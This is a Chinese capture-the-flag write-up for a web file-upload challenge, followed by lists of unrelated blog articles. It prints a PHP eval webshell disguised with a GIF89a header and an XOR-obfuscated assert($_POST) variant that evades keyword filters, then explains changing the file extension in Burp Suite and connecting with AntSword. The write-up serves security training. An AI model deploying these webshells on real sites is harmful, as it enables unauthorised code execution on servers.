题目

 进去之后看到这样一句话

 ctrl+u得到提示

 按照提示进去看看，发现是个文件上传的链接

按照提示修改staus的值然后上传一个木马文件看看

 发现报错了，只允许上传图片文件

 把后缀改成jpg再试试看

 依旧报错，它不仅对后缀名有要求而且会检查文件格式是否符合图片

给一句话木马的开头加上图片格式进行绕过

GIF89a

<?php @eval($_POST["yexi"]);?>

还是哒咩~过滤太多函数了

利用异或的方法重新构造一句话木马

GIF89a

<?=

@$_++;

$___=("~"^"?").("~"^"-").("~"^"-").("~"^";").("~"^",").("~"^"*");//ASSERT

$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");_POST

$___(${$__}[1]);//ASSERT($_POST[1])

?>

因为上传的过程中会检查文件中的关键词所以要把注释去掉，不然会报错

用burpsuite进行抓包，将上传的jpg文件改成php，放掉

 上传成功，可以在uploads中查看

用蚁剑连接，注意勾选base64,连接成功

 按照提示打开index.php即可得到flag

WEB-easy_upload相关推荐

1. UNCTF2020 | Web Wp

   文章目录 Web 0x01:easy_ssrf 0x02:babyeval 0x03:ezphp 0x04:easy_upload 0x05:L0vephp 0x06:easyflask 0x07:e ...

2. 在k8s中使用gradle构建java web项目镜像Dockerfile

   在k8s中使用gradle构建java web项目镜像Dockerfile FROM gradle:6-jdk8 AS build COPY --chown=gradle:gradle . /home ...

3. 手动将web项目的class文件打成jar包，手动打jar包，java -cvf，IDE打包底层指令

   手动将web项目的class文件打成jar包. 我们的项目在使用IDE进行编译后,在项目的target目录下将会生成class文件.我们可以将class文件打成jar包. 使用的到命令为: 在targ ...

4. 将Eclipse中Web项目打成war包

   将Eclipse中Web项目打成war包 请按如下操作即可:

5. Docker安装Apache与运行简单的web服务——httpd helloworld

   Docker运行简单的web服务--httpd helloworld目录[阅读时间:约5分钟] 一.Docker简介 二.Docker的安装与配置[CentOS环境] 三.Docker运行简单的web ...

6. 【Golang源码分析】Go Web常用程序包gorilla/mux的使用与源码简析

   目录[阅读时间:约10分钟] 一.概述 二.对比: gorilla/mux与net/http DefaultServeMux 三.简单使用 四.源码简析 1.NewRouter函数 2.HandleF ...

7. 基于Golang的简单web服务程序开发——CloudGo

   基于Golang的简单web服务程序开发--CloudGo[阅读时间:约10分钟] 一.概述 二.系统环境&项目介绍 1.系统环境 2.项目的任务要求 (1)基本要求 (2)扩展要求 三.具体 ...

8. CentOS Docker安装配置部署Golang web helloworld

   目录[阅读时间:约5分钟] 一.Docker简介 二.Docker的安装与配置[CentOS环境] 三.Docker部署Golang web helloworld 四.Docker与虚拟机的区别 五. ...

9. ideal如何创建dynamic web project

   步骤如下 ① file -> new -> project ② 选择 Java Enterprise -> next ③ create project from template - ...

10. eclipse运行maven web项目

    说在前面:Maven项目对象模型(POM),可以通过一小段描述信息来管理项目的构建,报告和文档的软件项目管理工具.现在好多公司都在使用.有时候我们想在eclipse启动maven项目,怎么操作呢,下面 ...

最新文章

1. java 关于分页的实现
2. CNCF 宣布成立应用交付领域小组，正式开启云原生应用时代
3. 不会跳回到微博认定申请书
4. es elasticsearch 几种常见查询场景 二次分组 java读取es的查询json文件
5. JSON数据从OSS迁移到MaxCompute最佳实践 1
6. Confluence 6 完成你的任务
7. 大学生在校期间可以考哪些证书？
8. 红帽发布虚拟化策略 产品即将上市
9. Oracle监听注册和sqlnet,Oracle监听配置(四)--如何实现静态、动态注册
10. linux内核C -- 第09课：链接过程中的强符号和弱符号
11. 计算机软件水平考试中级题目,计算机软考中级考试试题及答案
12. 前端跨域解决方案总结
13. 一起学libcef--一个应用libcef的简单例子（windows程序）
14. 效率直接起飞的PPT技巧，你知道吗
15. MIUI12系统怎么样开启Root超级权限的流程
16. 风儿轻轻地吹，沙儿轻轻地飘
17. CLH Lock 原理
18. R语言 | 编写自己的函数
19. 使用在线链接阿里图标库（iconfont）(vue)
20. MVVM理解 ——（2）数据劫持

热门文章

1. Spring Cloud简单笔记
2. qt控制程序打开记事本_基于QT记事本应用程序开发.doc
3. 【linux】md5sum 命令详解
4. 同声传译系统matlab,知到网课答案英语基础口译课后作业答案
5. Java线程之setDaemon(true)方法的作用
6. python pyqtgraph绘图库-绘制图形
7. AI智能改写-文本改写人工智能
8. nginx的下载与安装
9. 代谢组学分析平台都有什么仪器？
10. 程序的灵活性与可扩展性